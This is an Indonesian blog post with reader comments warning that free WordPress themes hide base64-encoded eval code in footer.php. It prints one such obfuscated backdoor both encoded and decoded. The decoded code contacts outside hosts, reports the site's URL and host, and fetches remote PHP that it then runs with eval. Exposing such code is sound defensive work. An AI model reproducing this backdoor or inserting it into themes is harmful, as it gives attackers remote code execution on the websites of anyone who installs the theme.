Eval di Theme
Nemu kode ini di file footer.php pada theme wordpress yang baru saja saya download.
PHP:
-
<?
-
bZC9bsMwDITnFOg7XD21g+PdVWSgS7t1CZCxkCLa
-
EixLqqTECNCHrxX3ZwkXHu7IDyA7zh7qGpIG49B7
-
nymirvn93WbDGmXOq+qCDhgofySjSIr4+PSMrkR/
-
M0UvEkbtqhVTFRtggUNRMoMjBXlpwQR0pH5X6ZxD
-
2zTzPG8nMdLnyRzH7dFPFX931jjCgWQymfByMlZR
-
ZI3gEE7dRswktU/ZuGEgGtMKWgh4W12U9dcS4Qvi
-
LIwV0hL6SASRW+x9uIXNPswha5roB4mDjypESgn7
-
q124rAnLtVjq9yH/XXp1uQqdJ8tZ9w0=
-
'))); ?>
Sebenarnya ngga ada masalah di kode tersebut. Jadinya kira-kira begini ketika eval diubah jadi echo :
CODE:
-
?><!-- begin footer -->
-
</div>
-
<?php get_sidebar(); ?>
-
</div>
-
<div id="footer">
-
<p> designed by: <a href="http://www.makequick.com">Online Website Builder</a> and: <a href="http://www.webhostinggeeks.com">Web Hosting </a>Geeks | available free at: Top<a href="http://www.topwpthemes.com"> Wordpress Themes</a></p>
-
</div>
-
</div>
-
</body>
-
</html><?
Tapi apa jadinya ya kalau ada kode ini :
PHP:
-
<?
-
jY3MzVBQkMzMDkxNiA9IEBmc29ja29wZW4oInd3dy53cHNzci5jb20i\
-
LCA4MCwgJFIzMkQwMDA3MEQ0RkZCQ0NFMkZDNjY5QkJBODEyRDRDMiw\
-
gJFI1RjUyNUY1QjM5OERBREQ3Q0YwNzg0QkQ0MDYyOThFMywgMykpICR\
-
SNTBGNUY5QzgwRjEyRkZBRThCMjQwMDUyOEU4MUIzNEUgPSAid3Bzc3I\
-
iOyBlbHNlaWYoJFIzN0MwMTREQUU1RkU0RkU1Qzc3QjY3MzVBQkMzMD\
-
kxNiA9IEBmc29ja29wZW4oInd3dy53cHNuYy5jb20iLCA4MCwgJFIzMk\
-
QwMDA3MEQ0RkZCQ0NFMkZDNjY5QkJBODEyRDRDMiwgJFI1RjUyNUY1Qj\
-
M5OERBREQ3Q0YwNzg0QkQ0MDYyOThFMywgMykpICRSNTBGNUY5QzgwRj\
-
EyRkZBRThCMjQwMDUyOEU4MUIzNEUgPSAid3BzbmMiOyBlbHNlICRSNT\
-
BGNUY5QzgwRjEyRkZBRThCMjQwMDUyOEU4MUIzNEUgPSAid3BzbmMyIj\
-
sgQGV2YWwoJyRSMTRBRjFCRTlFRTI2QTkwOTIxRTY0QTgyRTc4MzY3OT\
-
cgPSAxOycpOyBpZigkUjE0QUYxQkU5RUUyNkE5MDkyMUU2NEE4MkU3OD\
-
M2Nzk3IEFORCBpbmlfZ2V0KCdhbGxvd191cmxfZm9wZW4nKSkgeyAgJF\
-
JEM0ZFOUMxMEE4MDhBNTRFQTJBM0RCRDlFNjA1QjY5NiA9ICIxIjsgIC\
-
RSNkU0RjE0QjMzNTI0M0JFNjU2QzY1RTNFRDlFMUIxMTUgPSAiaHR0cD\
-
ovL3d3dy4kUjUwRjVGOUM4MEYxMkZGQUU4QjI0MDA1MjhFODFCMzRFLm\
-
NvbS93JFJEM0ZFOUMxMEE4MDhBNTRFQTJBM0RCRDlFNjA1QjY5Ni5waH\
-
A/dXJsPSIuIHVybGVuY29kZSgkX1NFUlZFUlsnUkVRVUVTVF9VUkknXS\
-
kgLiImIi4gImhvc3Q9Ii4gdXJsZW5jb2RlKCRfU0VSVkVSWydIVFRQX0\
-
hPU1QnXSk7ICAkUjNFMzNFMDE3Q0Q3NkI5QjdFNkM3MzY0RkI5MUUyRT\
-
kwID0gQGZpbGVfZ2V0X2NvbnRlbnRzKCRSNkU0RjE0QjMzNTI0M0JFNj\
-
U2QzY1RTNFRDlFMUIxMTUpOyAgQGV2YWwoJFIzRTMzRTAxN0NENzZCOU\
-
I3RTZDNzM2NEZCOTFFMkU5MCk7IH0gZWxzZSB7ICAkUkQzRkU5QzEwQT\
-
gwOEE1NEVBMkEzREJEOUU2MDVCNjk2ID0gIjAiOyAgJFI2RTRGMTRCMz\
-
M1MjQzQkU2NTZDNjVFM0VEOUUxQjExNSA9ICJodHRwOi8vd3d3LiRSNT\
-
BGNUY5QzgwRjEyRkZBRThCMjQwMDUyOEU4MUIzNEUuY29tL3ckUkQzRk\
-
U5QzEwQTgwOEE1NEVBMkEzREJEOUU2MDVCNjk2LnBocD91cmw9Ii4gdX\
-
JsZW5jb2RlKCRfU0VSVkVSWydSRVFVRVNUX1VSSSddKSAuIiYiLiAiaG\
-
9zdD0iLiB1cmxlbmNvZGUoJF9TRVJWRVJbJ0hUVFBfSE9TVCddKTsgIE\
-
ByZWFkZmlsZSgkUjZFNEYxNEIzMzUyNDNCRTY1NkM2NUUzRUQ5RTFCMT\
-
E1KTsgfSBmY2xvc2UoJFIzN0MwMTREQUU1RkU0RkU1Qzc3QjY3MzVBQk\
-
MzMDkxNik7?));
-
?>
Pipis aja ngga boleh sembarangan, apalagi download theme yah. Dah ah. * mburuh kerja lagi *
** kode ketiga dan kampanye "jangan download theme sembarangan" ada disini.
Update : Kode diatas jadinya seperti ini :
PHP:
-
<?php
-
if($R37C014DAE5FE4FE5C77B6735ABC30916 = @fsockopen("www.wpssr.com", 80, $R32D00070D4FFBCCE2FC669BBA812D4C2, $R5F525F5B398DADD7CF0784BD406298E3, 3)) $R50F5F9C80F12FFAE8B2400528E81B34E = "wpssr"; elseif($R37C014DAE5FE4FE5C77B6735ABC30916 = @fsockopen("www.wpsnc.com", 80, $R32D00070D4FFBCCE2FC669BBA812D4C2, $R5F525F5B398DADD7CF0784BD406298E3, 3)) $R50F5F9C80F12FFAE8B2400528E81B34E = "wpsnc"; else $R50F5F9C80F12FFAE8B2400528E81B34E = "wpsnc2"; @eval('$R14AF1BE9EE26A90921E64A82E7836797 = 1;'); if($R14AF1BE9EE26A90921E64A82E7836797 AND ini_get('allow_url_fopen')) { $RD3FE9C10A808A54EA2A3DBD9E605B696 = "1"; $R6E4F14B335243BE656C65E3ED9E1B115 = "http://www.$R50F5F9C80F12FFAE8B2400528E81B34E.com/w$RD3FE9C10A808A54EA2A3DBD9E605B696.php?url=". urlencode($_SERVER['REQUEST_URI']) ."&". "host=". urlencode($_SERVER['HTTP_HOST']); $R3E33E017CD76B9B7E6C7364FB91E2E90 = @file_get_contents($R6E4F14B335243BE656C65E3ED9E1B115); @eval($R3E33E017CD76B9B7E6C7364FB91E2E90); } else { $RD3FE9C10A808A54EA2A3DBD9E605B696 = "0"; $R6E4F14B335243BE656C65E3ED9E1B115 = "http://www.$R50F5F9C80F12FFAE8B2400528E81B34E.com/w$RD3FE9C10A808A54EA2A3DBD9E605B696.php?url=". urlencode($_SERVER['REQUEST_URI']) ."&". "host=". urlencode($_SERVER['HTTP_HOST']); @readfile($R6E4F14B335243BE656C65E3ED9E1B115); } fclose($R37C014DAE5FE4FE5C77B6735ABC30916);
-
?>
Semoga sandalilang sama pangsit puas.
March 8th, 2008 at 3:52 am
ga kebaca itu isinya apaan T_T
March 8th, 2008 at 4:22 am
nganu kang.. parse error je
itu isinya apa ?
March 8th, 2008 at 12:07 pm
@sandal sama pangsit
tuh udah di update sama isi aslinya.
kalau error, ya maap. tanda ' berubah jadi ’ je. hehe..
March 9th, 2008 at 4:45 am
Wah kode berbahaya yah saya sempet lihat topik tersebut di id.forum.wordpress.org By The Way mas saya ada tag untuk mas tolong di cek yah trims
March 10th, 2008 at 4:27 am
*udah ndak donlot lagi beberapa waktu ini*
March 10th, 2008 at 4:40 am
waduh
March 10th, 2008 at 7:55 am
nah itu dia, saya juga pernah menemukannya, dan sempat bingung cara ngedit nya.. sebenar nya itu jenis pemrograman apa yah?
March 10th, 2008 at 2:11 pm
@quelopi
) ke base64 . terus hasil encode di-decode di file-file nya wordpress.
itu masih php. cuma di encode (encode sama dengan enkrip ngga sih ?
@daniel
berbahaya ? tergantung kodenya juga. kalau dari contoh yang 1, ngga berbahaya. kayaknya sih si penyedia link download ngga mau footer nya diubah-ubah.
makasih tag nya. kalau sempat akan saya kerjakan.
March 11th, 2008 at 3:54 am
puyeng jeng
gk ngarti
March 11th, 2008 at 7:16 am
Saya punya loh script untuk mengdecodenya
kemaren dapet di php.net. URI bscore.net/programming/decodeing-fungsi-eval/
March 11th, 2008 at 11:22 pm
wah.. makanya, dulu pernah coba donlot free WP Themes, di footernya ada tulisan kek gitu.. >_<
untung cuma buat belajar themesnya waktu itu
txs bro agung
March 12th, 2008 at 5:17 pm
March 14th, 2008 at 2:51 am
ga ngerti sayah. . .